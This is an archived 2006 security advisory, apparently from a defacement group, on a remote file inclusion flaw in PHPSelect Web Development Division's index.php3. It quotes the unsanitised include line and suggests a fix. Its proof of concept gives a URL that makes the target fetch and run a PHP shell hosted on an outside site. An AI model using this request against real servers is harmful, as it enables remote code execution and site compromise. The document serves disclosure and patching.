Lucene search
SecurityvulnsSECURITYVULNS:DOC:14463HistorySep 28, 2006 - 12:00 a.m.
PHPSelect Web Development Division <= Remote File Inclusion
2006-09-2800:00:00
vulners.com
37
±-------------------------------------------------------------------
+
- PHPSelect Web Development Division :) <= Remote File Inclusion
±-------------------------------------------------------------------
+
- Affected Software .: PHPSelect Web Development Division
- Venedor …: http://www.phpselect.com/
- Class …: Remote File Inclusion
- Risk …: high (Remote File Execution)
- Found by …: rUnViRuS
- Original advisory .: http://www.wdzone.net/ http://www.worlddefacers.de/
- Contact …: stormhacker[at]hotmail[.]com
±-------------------------------------------------------------------
+
- Code index.php3:
- …
- include("$Application_Root/modules/include/global_settings");
- …
±-------------------------------------------------------------------
+
- $Application_Root is not properly sanitized before being used.
- The bug is in the "PDD" Package for PHPSelect Web Development Division.
±-------------------------------------------------------------------
+
- Solution:
- Add this line to your php-file:
- $Application_Root ="user/dir" //Your root path
±-------------------------------------------------------------------
- PoC:
- Place a PHPShell on a remote location:
- http://wdzone.net/sh.txt?
http://[target]/index.php3?Application_Root=http://phpshell
+
±-------------------------------------------------------------------
- [W]orld [D]efacers [T]eam
- Greets:
- || rUnViRuS || - || papipsycho || - || HeX || - || Linux Master || BlackWHITE ||
- || Pro Hacker ||
±------------------------[ W D T ]----------------------------------